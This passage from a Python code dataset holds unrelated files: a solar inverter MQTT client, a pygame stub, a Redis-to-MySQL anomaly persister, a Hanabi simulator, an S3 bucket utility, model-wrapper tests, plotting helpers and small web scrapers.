= round(((pv_energy_pre + float(pv_power * cycle / 3600000.0)) / 2), 4) # расчет солнечной энергии за период опроса инвертора \r\n pv_energy_pre = float(pv_power * cycle / 3600000.0)\r\n \r\n print('QPIGS : ', comm_state)\r\n \r\n client.publish(topic+'/status/grid_voltage', grid_voltage, 0)\r\n client.publish(topic+'/status/grid_frequency', grid_frequency, 0)\r\n client.publish(topic+'/status/ac_voltage', ac_voltage, 0)\r\n client.publish(topic+'/status/ac_frequency', ac_frequency, 0)\r\n client.publish(topic+'/status/ac_va_power', ac_va_power, 0)\r\n client.publish(topic+'/status/ac_w_power', ac_w_power, 0)\r\n client.publish(topic+'/status/ac_energy', ac_energy, 0)\r\n client.publish(topic+'/status/ac_load', ac_load, 0)\r\n client.publish(topic+'/status/bus_voltage', bus_voltage, 0)\r\n client.publish(topic+'/status/batt_voltage', batt_voltage, 0)\r\n client.publish(topic+'/status/batt_charging', batt_charging, 0)\r\n client.publish(topic+'/status/batt_capacity', batt_capacity, 0)\r\n client.publish(topic+'/status/temp_inverter', temp_inverter, 0)\r\n client.publish(topic+'/status/pv_current', pv_current, 0)\r\n client.publish(topic+'/status/pv_voltage', pv_voltage, 0)\r\n client.publish(topic+'/status/pv_power', pv_power, 0)\r\n client.publish(topic+'/status/pv_energy', pv_energy, 0)\r\n client.publish(topic+'/status/scc_voltage', scc_voltage, 0)\r\n client.publish(topic+'/status/batt_discharge', batt_discharge, 0)\r\n client.publish(topic+'/status/load', load, 0)\r\n client.publish(topic+'/status/charging', charging, 0)\r\n client.publish(topic+'/status/charging_status', charging_status, 0)\r\n client.publish(topic+'/status/charging_scc', charging_scc, 0)\r\n client.publish(topic+'/status/charging_grid', charging_grid, 0)\r\n client.publish(topic+'/status/QPIGS_comm', comm_state, 0) \r\n \r\n\r\n# - режим работы инвертора\r\n\r\n mode = 'unknow'\r\n comm_state = 'ok' \r\n\r\n reply = comm_inverter(QMOD)\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n print(data, 'len =', length) \r\n if crc_ok and length == 5 :\r\n try: \r\n if data == '(P' : mode = 'Pover On mode'\r\n if data == '(S' : mode = 'Standby mode'\r\n if data == '(L' : mode = 'Line mode'\r\n if data == '(B' : mode = 'Battery mode'\r\n if data == '(F' : mode = 'Fault mode'\r\n if data == '(H' : mode = 'Pover saving mode' \r\n except: \r\n comm_state = 'decryption error'\r\n else:\r\n if ser_state : comm_state = 'read error'\r\n else : comm_state = 'COM-port error'\r\n\r\n print('QMOD : ', comm_state)\r\n \r\n client.publish(topic+'/mode/mode', mode , 0)\r\n client.publish(topic+'/mode/QMOD_comm', comm_state , 0)\r\n\r\n# - состояние инвертора\r\n\r\n source_range = 'unknow'\r\n source_priority = 'unknow'\r\n charger_priority = 'unknow'\r\n batt_recharge_voltage = 0.0\r\n batt_under_voltage = 0.0\r\n batt_redischarge_voltage = 0.0\r\n comm_state = 'ok'\r\n \r\n reply = comm_inverter(QPIRI)\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n print(data, 'len =', length)\r\n if crc_ok and length == 98 :\r\n try:\r\n if data[72] == '0' : source_range = 'APP'\r\n if data[72] == '1' : source_range = 'UPS' \r\n \r\n if data[74] == '0' : source_priority = 'UTI'\r\n if data[74] == '1' : source_priority = 'SOL'\r\n if data[74] == '2' : source_priority = 'SBU' \r\n \r\n if data[76] == '0' : charger_priority = 'UTI'\r\n if data[76] == '1' : charger_priority = 'SOL'\r\n if data[76] == '2' : charger_priority = 'SOL+UTI'\r\n if data[76] == '3' : charger_priority = 'OnlySOL' \r\n \r\n \r\n 
batt_recharge_voltage = float(data[43:47].replace(',', '.'))\r\n batt_under_voltage = float(data[48:52].replace(',', '.'))\r\n batt_redischarge_voltage = float(data[87:91].replace(',', '.'))\r\n info_rd = True\r\n except: \r\n comm_state = 'decryption error' \r\n else:\r\n if ser_state : comm_state = 'read error'\r\n else : comm_state = 'COM-port error'\r\n \r\n print('QPIRI : ', comm_state)\r\n\r\n client.publish(topic+'/info/source_range', source_range , 0)\r\n client.publish(topic+'/info/source_priority', source_priority , 0)\r\n client.publish(topic+'/info/charger_priority', charger_priority , 0)\r\n client.publish(topic+'/info/batt_recharge_voltage', batt_recharge_voltage , 0)\r\n client.publish(topic+'/info/batt_under_voltage', batt_under_voltage , 0)\r\n client.publish(topic+'/info/batt_redischarge_voltage', batt_redischarge_voltage , 0)\r\n client.publish(topic+'/info/QPIRI_comm', comm_state, 0)\r\n \r\n\r\n# - ошибки и неисправности инвертора\r\n \r\n alarm_1 = 'none'\r\n alarm_2 = 'none'\r\n alarm_3 = 'none'\r\n alarm_4 = 'none'\r\n alarm_5 = 'none'\r\n alarm_6 = 'none'\r\n alarm_7 = 'none'\r\n alarm_8 = 'none'\r\n alarm_9 = 'none'\r\n alarm_10 = 'none'\r\n alarm_11 = 'none'\r\n alarm_12 = 'none'\r\n alarm_13 = 'none'\r\n alarm_14 = 'none'\r\n alarm_15 = 'none'\r\n alarm_16 = 'none'\r\n alarm_17 = 'none'\r\n alarm_18 = 'none'\r\n alarm_19 = 'none'\r\n alarm_20 = 'none'\r\n alarm_21 = 'none'\r\n alarm_22 = 'none'\r\n alarm_23 = 'none'\r\n alarm_24 = 'none'\r\n alarm_25 = 'none'\r\n alarm_26 = 'none'\r\n alarm_27 = 'none'\r\n alarm_28 = 'none'\r\n alarm_29 = 'none'\r\n alarm_30 = 'none'\r\n alarm_31 = 'none'\r\n alarm_32 = 'none' \r\n comm_state = 'ok'\r\n \r\n reply = comm_inverter(QPIWS)\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n print(data, 'len =', length)\r\n if crc_ok and length == 36 :\r\n alarm = 'Warning'\r\n try:\r\n if data[1] == '1' : alarm_1 = 'Fault'\r\n if data[2] == '1' : alarm_2 = 'Fault'; alarm = 'Fault'\r\n if data[3] == '1' : alarm_3 = 'Fault'\r\n if data[4] == '1' : alarm_4 = 'Fault'\r\n if data[5] == '1' : alarm_5 = 'Fault'\r\n if data[6] == '1' : alarm_6 = 'Fault'\r\n if data[7] == '1' : alarm_7 = 'Fault'\r\n if data[8] == '1' : alarm_8 = 'Fault'\r\n if data[9] == '1' : alarm_9 = 'Fault'\r\n if data[10] == '1' : alarm_10 = alarm\r\n if data[11] == '1' : alarm_11 = alarm\r\n if data[12] == '1' : alarm_12 = alarm \r\n if data[13] == '1' : alarm_13 = 'Warning'\r\n if data[14] == '1' : alarm_14 = 'Fault'\r\n if data[15] == '1' : alarm_15 = 'Warning'\r\n if data[16] == '1' : alarm_16 = 'Fault'\r\n if data[17] == '1' : alarm_17 = alarm\r\n if data[18] == '1' : alarm_18 = 'Fault'\r\n if data[19] == '1' : alarm_19 = 'Fault'\r\n if data[20] == '1' : alarm_20 = 'Fault'\r\n if data[21] == '1' : alarm_21 = 'Fault'\r\n if data[22] == '1' : alarm_22 = 'Fault'\r\n if data[23] == '1' : alarm_23 = 'Fault'\r\n if data[24] == '1' : alarm_24 = 'Fault'\r\n if data[25] == '1' : alarm_25 = 'Fault'\r\n if data[26] == '1' : alarm_26 = 'Warning'\r\n if data[27] == '1' : alarm_27 = 'Warning'\r\n \r\n if data[29] == '1' : alarm_28 = 'Warning'\r\n if data[28] == '1' : alarm_28 = 'Fault'\r\n \r\n if data[30] == '1' : alarm_30 = 'Warning'\r\n if data[31] == '1' : alarm_31 = 'Fault'\r\n if data[32] == '1' : alarm_32 = 'Fault' \r\n except: \r\n comm_state = 'decryption error' \r\n else:\r\n if ser_state : comm_state = 'read error'\r\n else : comm_state = 'COM-port error'\r\n\r\n print('QPIWS : ', comm_state) \r\n\r\n #client.publish(topic+'/alarm/alarm_1', alarm_1, 
0)\r\n client.publish(topic+'/alarm/inverter', alarm_2, 0)\r\n client.publish(topic+'/alarm/bus_over', alarm_3, 0)\r\n client.publish(topic+'/alarm/bus_under', alarm_4, 0)\r\n client.publish(topic+'/alarm/bus_soft_fail', alarm_5, 0)\r\n client.publish(topic+'/alarm/line_fail', alarm_6, 0)\r\n client.publish(topic+'/alarm/opv_short', alarm_7, 0)\r\n client.publish(topic+'/alarm/inverter_voltage_too_low', alarm_8, 0)\r\n client.publish(topic+'/alarm/inverter_voltage_too_high', alarm_9, 0)\r\n client.publish(topic+'/alarm/over_temperature', alarm_10, 0)\r\n client.publish(topic+'/alarm/fan_locked', alarm_11, 0)\r\n client.publish(topic+'/alarm/battery_voltage_high', alarm_12, 0) \r\n client.publish(topic+'/alarm/battery_low', alarm_13, 0)\r\n #client.publish(topic+'/alarm/alarm_14', alarm_14, 0)\r\n client.publish(topic+'/alarm/battery_under_shutdown', alarm_15, 0)\r\n #client.publish(topic+'/alarm/alarm_16', alarm_16, 0)\r\n client.publish(topic+'/alarm/over_load', alarm_17, 0)\r\n client.publish(topic+'/alarm/eeprom fault', alarm_18, 0)\r\n client.publish(topic+'/alarm/inverter_over_current', alarm_19, 0)\r\n client.publish(topic+'/alarm/inverter_soft_fail', alarm_20, 0)\r\n client.publish(topic+'/alarm/self_test_fail', alarm_21, 0)\r\n client.publish(topic+'/alarm/op_dc_voltage_over', alarm_22, 0) \r\n client.publish(topic+'/alarm/bat_open', alarm_23, 0)\r\n client.publish(topic+'/alarm/current_sensor_fail', alarm_24, 0)\r\n client.publish(topic+'/alarm/battery_short', alarm_25, 0)\r\n client.publish(topic+'/alarm/power_limit', alarm_26, 0)\r\n client.publish(topic+'/alarm/pv_voltage_high', alarm_27, 0)\r\n client.publish(topic+'/alarm/mppt_overload', alarm_28, 0)\r\n \r\n client.publish(topic+'/alarm/battery_too_low_to_charge', alarm_30, 0)\r\n #client.publish(topic+'/alarm/alarm_31', alarm_31, 0)\r\n #client.publish(topic+'/alarm/alarm_32', alarm_32, 0) \r\n client.publish(topic+'/alarm/QPIWS_comm', comm_state, 0)\r\n","sub_path":"solar_mqtt_client.py","file_name":"solar_mqtt_client.py","file_ext":"py","file_size_in_byte":39422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"428692223","text":"# import pygame module\nimport pygame\n\n\ndef main():\n # this is the main function that is called upon program execution\n\n # init pygame module\n pygame.init()\n # load and set task bar logo\n logo = pygame.image.load(\"logo256x256.png\")\n pygame.display.set_icon(logo)\n pygame.display.set_caption(\"Space Company\")\n\n # create the set_mode surface\n screen = pygame.display.set_mode((1366, 768))\n screen.fill((255, 179, 0))\n\n # main menu function call\n main_menu(screen)\n\n # define a variable to control the main loop\n running = True\n\n # main loop\n while running:\n # event handling, gets all event from event queue\n for event in pygame.event.get():\n # only do something if the event is of type QUIT\n if event.type == pygame.QUIT:\n # change running to False to exit main loop\n running = False\n\n\ndef main_menu(screen):\n\n # main menu bg + title\n main_menu_bg = pygame.image.load(\"bg.png\")\n main_menu_title = pygame.image.load(\"title.png\")\n screen.blit(main_menu_bg, (0, 0))\n screen.blit(main_menu_title, (50, 50))\n\n # blit an image\n image = pygame.image.load(\"konoRegret.png\")\n screen.blit(image, (600, 300))\n pygame.display.flip()\n\n # text buttons\n\n\n\n# run the main function only if this module is executed as the main script\n# (if you import this as a module then nothing is executed.)\n\n\nif __name__ == 
\"__main__\":\n main()\n","sub_path":"SpaceCompany.py","file_name":"SpaceCompany.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"257939076","text":"from threading import Thread\nfrom redis import StrictRedis\nfrom os import kill\nfrom time import sleep, time\nfrom multiprocessing import Process\nfrom math import ceil\nfrom msgpack import Unpacker\nimport pymysql\n\nimport logging\nimport settings\n\nlogger = logging.getLogger(\"AnalyzerLog\")\n\n\nclass Persister(Thread):\n \"\"\"\n The Persister is responsible for saving anomaly data points to mysql database.\n \"\"\"\n def __init__(self, parent_pid):\n super(Persister, self).__init__()\n self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)\n self.mysql_conn = pymysql.connect(host=settings.MYSQL_HOST, port=settings.MYSQL_PORT, user=settings.MYSQL_USER,\n password=settings.MYSQL_PASSWORD, db=settings.MYSQL_DB, charset=settings.MYSQL_CHARSET)\n self.parent_pid = parent_pid\n\n def check_if_parent_is_alive(self):\n \"\"\"\n Self explanatory.\n \"\"\"\n try:\n kill(self.parent_pid, 0)\n except:\n exit(0)\n\n def do_persist(self, index, anomaly_unique_metrics):\n \"\"\"\n Assign a bunch of anomaly metrics for a process to persist.\n \"\"\"\n # Discover assigned metrics\n keys_per_processor = int(ceil(float(len(anomaly_unique_metrics)) / float(settings.PERSIST_PROCESSES)))\n if index == settings.PERSIST_PROCESSES:\n assigned_max = len(anomaly_unique_metrics)\n else:\n assigned_max = index * keys_per_processor\n assigned_min = assigned_max - keys_per_processor\n assigned_keys = range(assigned_min, assigned_max)\n\n # Compile assigned metrics\n assigned_metrics = [anomaly_unique_metrics[index] for index in assigned_keys]\n\n # Check if this process is unnecessary\n if len(assigned_metrics) == 0:\n return\n\n # Multi get series\n pipe = self.redis_conn.pipeline()\n pipe.multi()\n pipe.mget(assigned_metrics)\n for i, metric_name in enumerate(assigned_metrics):\n pipe.delete(metric_name)\n raw_assigned = pipe.execute()[0]\n\n # Distill timeseries strings into lists\n # store abnormal data point to mysql database\n cursor = self.mysql_conn.cursor()\n sql = 'INSERT into t_abnormal(time,data) VALUES (%s,%s);'\n for i, metric_name in enumerate(assigned_metrics):\n self.check_if_parent_is_alive()\n\n raw_series = raw_assigned[i]\n unpacker = Unpacker(use_list=False)\n unpacker.feed(raw_series)\n timeseries = list(unpacker)\n\n for j, datapoint in enumerate(timeseries):\n cursor.execute(sql, [str(datapoint[0]), str(datapoint)])\n self.mysql_conn.commit()\n cursor.close()\n\n def run(self):\n \"\"\"\n Called when process initializes.\n \"\"\"\n logger.info('started persister')\n\n while(1):\n\n now = time()\n\n # Make sure Redis is up\n try:\n self.redis_conn.ping()\n except:\n logger.error('skyline can\\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)\n sleep(10)\n self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)\n continue\n\n # Discover anomaly metrics\n anomaly_unique_metrics = list(self.redis_conn.smembers(settings.ANOMALY_NAMESPACE + 'unique_metrics'))\n if len(anomaly_unique_metrics) == 0:\n logger.info('No anomaly metrics in redis. 
Everything is fine.')\n sleep(60)\n continue\n\n # Spawn processes\n pids = []\n for i in range(1, settings.PERSIST_PROCESSES + 1):\n if i > len(anomaly_unique_metrics):\n logger.warning('WARNING: skyline is set for more cores than needed.')\n break\n\n p = Process(target=self.do_persist, args=(i, anomaly_unique_metrics))\n pids.append(p)\n p.start()\n\n # Send wait signal to zombie processes\n for p in pids:\n p.join()\n\n # Sleep if it went too fast\n if time() - now < 5:\n logger.info('persister sleeping due to low run time...')\n sleep(20)\n","sub_path":"src/analyzer/persister.py","file_name":"persister.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"232577115","text":"import re, sys, os\nfrom collections import defaultdict, Counter, deque\nfrom pprint import pprint\nfrom copy import deepcopy\nfrom itertools import count\n#from dateutil.parser import parse\n\n\nwith open('input', 'rt') as f:\n nums = [int(v) for v in f.read().strip().split(',')]\n\n\nsaid = {n: [i] for i, n in enumerate(nums)}\n\nlast = nums[-1]\n\ni = len(nums)\n\nwhile i < 2020:\n prev_said = said[last]\n if len(prev_said) == 1:\n curr = 0\n else:\n curr = i - prev_said[-2] - 1\n last = curr\n if curr in said:\n said[curr].append(i)\n else:\n said[curr] = [i]\n i += 1\n\n\nprint(last)\n\n","sub_path":"day15/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"90322284","text":"# !/usr/bin/env python\n# _*_ coding:utf-8 _*_\n\n\nimport requests\n\n\n# 发送带参数的请求\n\nclass Baidu_Spider(object):\n def __init__(self):\n # 第二种 传递参数 url 去掉了 wd=\n self.url = 'https://www.baidu.com/s?'\n self.search_content = input('请输入您要搜索的内容:')\n self.headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko\"}\n\n # 1.发送请求\n def send_request(self, url, params):\n response = requests.get(url, headers=self.headers, params=params)\n return response.content.decode()\n\n # 2.写入文件保存\n def write_file(self, data):\n with open('05params.html', 'w') as f:\n f.write(data)\n print('保存成功!')\n\n # 3. 调度\n def run(self):\n # 1.根据用户输入的内容 拼接 参数\n params = {\n \"wd\": self.search_content\n }\n\n # 2.发送请求\n data = self.send_request(self.url, params=params)\n # 3.保存数据\n self.write_file(data)\n\n\nif __name__ == '__main__':\n tool = Baidu_Spider()\n tool.run()\n","sub_path":"scrapy_lian/laoshi01/预习资料/05requestsparams2.py","file_name":"05requestsparams2.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"326147984","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. 
and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport copy\nimport unittest\nfrom test.generic.config_utils import get_fast_test_task_config\n\nimport torch\nimport torch.nn as nn\nfrom classy_vision.models import ClassyModel\nfrom classy_vision.models.classy_model_wrapper import ClassyModelWrapper\nfrom classy_vision.tasks import build_task\nfrom classy_vision.trainer import LocalTrainer\nfrom torchvision import models\n\n\nclass TestModel(nn.Module):\n def __init__(self):\n super().__init__()\n self.linear = nn.Linear(10, 5)\n\n def forward(self, x):\n return self.linear(x)\n\n def extract_features(self, x):\n return torch.cat([x, x], dim=1)\n\n\nclass TestClassyModelWrapper(unittest.TestCase):\n def test_classy_model_wrapper(self):\n model = TestModel()\n classy_model = ClassyModelWrapper(model)\n # test that the returned object is an instance of ClassyModel\n self.assertIsInstance(classy_model, ClassyModel)\n\n # test that forward works correctly\n input = torch.zeros((100, 10))\n output = classy_model(input)\n self.assertEqual(output.shape, (100, 5))\n\n # test that extract_features works correctly\n input = torch.zeros((100, 10))\n output = classy_model.extract_features(input)\n self.assertEqual(output.shape, (100, 20))\n\n # test that get_classy_state and set_classy_state work\n nn.init.constant_(classy_model.model.linear.weight, 1)\n weights = copy.deepcopy(classy_model.model.linear.weight.data)\n state_dict = classy_model.get_classy_state(deep_copy=True)\n nn.init.constant_(classy_model.model.linear.weight, 0)\n classy_model.set_classy_state(state_dict)\n self.assertTrue(torch.allclose(weights, classy_model.model.linear.weight.data))\n\n def test_classy_model_wrapper_properties(self):\n # test that the properties work correctly when passed to the wrapper\n model = TestModel()\n num_classes = 5\n input_shape = (10,)\n output_shape = (num_classes,)\n model_depth = 1\n classy_model = ClassyModelWrapper(\n model,\n input_shape=input_shape,\n output_shape=output_shape,\n model_depth=model_depth,\n )\n self.assertEqual(classy_model.input_shape, input_shape)\n self.assertEqual(classy_model.output_shape, output_shape)\n self.assertEqual(classy_model.model_depth, model_depth)\n\n def test_train_step(self):\n # test that the model can be run in a train step\n model = models.resnet34(pretrained=False)\n classy_model = ClassyModelWrapper(model)\n\n config = get_fast_test_task_config()\n task = build_task(config)\n task.set_model(classy_model)\n trainer = LocalTrainer()\n trainer.train(task)\n","sub_path":"test/models_classy_model_wrapper_test.py","file_name":"models_classy_model_wrapper_test.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"113348424","text":"# Ask 1\r\n\r\nimport codecs\r\nimport os\r\n\r\n# checking if the file name is valid and can be read\r\nwhile True:\r\n f1 = input(\"Give the name of the file: \")\r\n if os.access(f1, os.R_OK):\r\n break\r\nfile = codecs.open(f1, \"r\", encoding='utf-8')\r\nwordlist = []\r\nword = \"\"\r\n\r\n# importing the words into a list\r\nfor letter in file.read():\r\n if letter.isalpha():\r\n word += letter\r\n elif letter in \"0123456789\":\r\n word = \"\"\r\n else:\r\n wordlist.append(word)\r\n word = \"\"\r\nfile.close()\r\n\r\n# list sorting\r\nword = \"\"\r\nfor i in range(len(wordlist)-1):\r\n for j in range(len(wordlist)-1, i-1, 
-1):\r\n        if len(wordlist[j]) > len(wordlist[j-1]):\r\n            wordlist[j],wordlist[j-1] = wordlist[j-1],wordlist[j]\r\n\r\n# removing the smaller words\r\nfor i in range(len(wordlist)):\r\n    if i>=5:\r\n        wordlist[i] = \"\"\r\n\r\n# list reversing\r\nfor i in range(len(wordlist)-1):\r\n    for j in wordlist[i]:\r\n        word = j + word\r\n    wordlist[i] = word\r\n    word = \"\"\r\n\r\n# removing vowels from list items\r\nword = \"\"\r\nfor i in range(len(wordlist)-1):\r\n    for j in wordlist[i]:\r\n        if j in \"aeyuioAEYUIO\":\r\n            word += \"\"\r\n        elif j in \"αεηιυοωάέήίύόώΑΕΗΙΥΟΩΆΈΉΊΎΌΏ\":\r\n            word += \"\"\r\n        else:\r\n            word += j\r\n    wordlist[i] = word\r\n    word = \"\"\r\n\r\n# printing the 5 biggest words reversed with the vowels removed\r\nif len(wordlist) >= 5:\r\n    for i in range(5):\r\n        print(wordlist[i])\r\nelse:\r\n    for i in wordlist:\r\n        print(i)","sub_path":"code1.py","file_name":"code1.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"9451417","text":"import sys\nimport boto3\nimport json\nimport botocore\nimport argparse\n\n# define the function blocks for different S3 bucket operations\ndef bucket_exists():\n    if bucket_name.creation_date:\n        print('bucket exists')\n        return True \n    else:\n        print('bucket does not exist')\n        return False\n#Deletes bucket and its contents\ndef delete_bucket():\n    bucket_name.objects.all().delete()\n    bucket_name.delete()\n\n#Empties contents of bucket\ndef empty_bucket():\n    bucket_name.objects.all().delete()\n\n#Check for file/folder/key within bucket\ndef check_key():\n    objs = list(bucket_name.objects.filter(Prefix=key))\n    if len(objs) > 0 and objs[0].key == key:\n        return True\n    else:\n        return False\n#Read contents of key from bucket and return it\ndef read_keyfile():\n    if check_key():\n        return s3.Object(args.bucket,key).get()['Body'].read()\n    else:\n        return None\n\n#Prints out all file/folder contents in a bucket\ndef bucket_contents():\n    for object in bucket_name.objects.all():\n        print(object)\n\nif __name__ == '__main__':\n\n    c2 = boto3.resource('ec2')\n    s3 = boto3.resource('s3')\n    parser = argparse.ArgumentParser(description='Perform various operations on a specific S3 bucket')\n    parser.add_argument('-o', dest='operation', required=True, help='Operation you want performed on a specific S3 bucket')\n    parser.add_argument('-b', dest='bucket', required=True, help='Name of the S3 bucket')\n    parser.add_argument('-f', dest='key', required=False, default=None, help='Full path of file/folder/key in S3 bucket')\n    \n    args = parser.parse_args()\n\n    s3_operation = args.operation\n    bucket_name = s3.Bucket(args.bucket)\n    key = args.key\n\n# map the inputs to the function blocks\n    options = {'a' : bucket_exists,\n               'b' : check_key,\n               'c' : empty_bucket,\n               'd' : delete_bucket,\n               'f' : read_keyfile,\n               'g' : bucket_contents,\n               'h' : read_keyfile,\n    }\n\n    options[s3_operation]()\n","sub_path":"tools/aws/s3_monitor.py","file_name":"s3_monitor.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357312741","text":"# a player has 5 cards, the left most card is to throw away, the right most card is the new one\n# a player has 'information' which is the last hint received as ['type', 'value', 'cards'] e.g. 
[1,4]\n\nfrom setup import start_situation\nfrom game_functions import discard, next_player, determine_hint, discard_risk, play_card\n\n# input variables\nnumber_of_players = 2\ninclude_multi = False\n\n# initialize variables\ndiscard_pile = [] # initialize the discard place to track discarded cards\nhint_chips = 8 # start with 8 hint_chips\nerror_chips = 0 # start with 0 error chips\ncurrent_player = 0 # start with first player\n\n# start_situation(number_of_players [2-5], include_multicolor [True/False])\nsituation, deck, cards_on_table, cards_needed = start_situation(number_of_players, include_multi)\n\n\n# start the game\n\ndef take_turn(situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips):\n # 1. check if last card next player is issue [add later]\n\n # 2. check if you can play a card\n card_info = situation[current_player]['information']\n if card_info:\n print(\"card to play: \" + str(card_info))\n play_card(deck, situation, current_player, discard_pile, cards_needed, cards_on_table, error_chips)\n return situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips\n\n # 3. can you give a hint\n hint = determine_hint(situation, current_player, hint_chips, cards_needed)\n print(hint)\n if hint:\n print(\"give hint: \" + str(hint))\n\n # give that hint\n situation[next_player(current_player, number_of_players)]['information'] = [hint]\n return situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips\n\n # 4. discard\n if hint_chips < 8:\n print(\"discard\")\n situation, deck, discard_pile, hint_chips = discard(situation, current_player, deck, discard_pile, hint_chips)\n return situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips\n\n print(\"turn wasted\")\n return situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips\n\n\ndef play_game(situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips):\n while deck:\n situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips = take_turn(situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips)\n current_player = next_player(current_player, number_of_players)\n\n if error_chips > 3:\n print(\"too many errors\")\n return\n\n# play_game(situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips)\n\nfor i in range(30):\n\n for j in situation:\n print(j)\n\n situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips = take_turn(situation, current_player, discard_pile, hint_chips, deck, cards_needed, cards_on_table, error_chips)\n current_player = next_player(current_player, number_of_players)\n print('..........')\n\nprint(cards_needed)\n\n# current_player = next_player(current_player, number_of_players)\n# situation, deck, discard_pile, hint_chips = discard(situation, current_player, deck, discard_pile, hint_chips)\n","sub_path":"play_hanabi.py","file_name":"play_hanabi.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"241761467","text":"import inspect\nimport os.path\n\n\nclass BuildSystemException(Exception):\n def __init__(self, text, exit_code=None, frame=1):\n if exit_code is None:\n frame_info = 
inspect.stack()[frame]\n            msg = '[{}({})] {}'.format(os.path.basename(frame_info[1]), frame_info[2], text)\n        else:\n            msg = text\n        Exception.__init__(self, msg)\n        self.exit_code = 126\n        if exit_code is not None:\n            self.exit_code = exit_code\n\n    def to_exit_code(self):\n        return self.exit_code\n\nclass BuildSystemPureVirtualCall(BuildSystemException):\n    def __init__(self, class_instance):\n        frame_info = inspect.stack()[1]\n        BuildSystemException.__init__(self, \"Pure virtual call - {}::{}\".format(type(class_instance).__name__, frame_info[3]), frame=3)","sub_path":"pylibs/minibuild/error_utils.py","file_name":"error_utils.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"146825250","text":"# -*- coding: utf-8 -*-\n\"\"\"a function of plotting figures.\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef cross_validation_visualization(param, rmse_tr, rmse_te, param_type):\n    \"\"\"visualize the curves of rmse_tr and rmse_te.\"\"\"\n    \n    #Param type can be: degree, gamma, lambda\n    \n    plt.semilogx(param, rmse_tr, marker=\".\", color='b', label='train error')\n    plt.semilogx(param, rmse_te, marker=\".\", color='r', label='test error')\n    plt.xlabel(param_type)\n    plt.ylabel(\"rmse\")\n    plt.title(\"cross validation\")\n    plt.legend(loc=2)\n    plt.grid(True)\n    plt.savefig(\"cross validation for \" + param_type)\n\n\n\ndef cross_validation_jets(param, rmse_te_list, param_type):\n    \n    colours = ['b','r','g','m']\n    jets = np.arange(4)\n    \n    for (rmse_te, col, jet_num) in zip(rmse_te_list, colours, jets):\n        txt = 'test error ' + str(jet_num)\n        plt.semilogx(param, rmse_te, marker=\".\", color= col, label=txt)\n    \n    plt.xlabel(param_type)\n    plt.ylabel(\"rmse\")\n    plt.title(\"cross validation\")\n    plt.legend(loc=2)\n    plt.grid(True)\n    \n    plt.savefig(\"cross validation all jets 1 method for \" + param_type)\n\n\ndef plot_variance(rmse_te, param):\n    fig, ax1 = plt.subplots()\n    title = 'RMSE test data versus ' + param\n    ax1.set_title(title)\n    ax1.boxplot(rmse_te.T)","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"430879837","text":"import urllib2\nimport chardet\n\ncitiesDict = {} #pinyin:char\n\n#Grabs html off Baixing of cities page\ndef getCitiesHTML():\n\turl = \"http://baixing.com/?changeLocation=yes\"\n\thtml = urllib2.urlopen(url)\n\tmyFile = open(\"Baixing_citySourceCode.txt\", \"w\")\n\tfor line in html:\n\t\tmyFile.write(line)\n\tmyFile.close()\n\n#Finds just the city names (pinyin and char), writes to Parsed_Cities.txt\ndef parseCitiesWhile():\n\tglobal citiesDict\n\t# Parse source code file to get content\n\tcontent = \"\"\n\tmyFile = open(\"Baixing_citySourceCode.txt\", \"r\")\n\tfor line in myFile:\n\t\tcontent += line\n\tmyFile.close()\n\n\t# Cut content to only include table containing cities\n\tbegin = content.find(\"new_cities\")\n\tend = content.find(\"</tr></table></table>\") # end of cities table\n\tcontent = content[begin:end]\n\n\tparsedCitiesFile = open('Parsed_Cities.txt', \"w\")\n\n\t# While loop to add cities pinyin and char to citiesDict\n\twhile 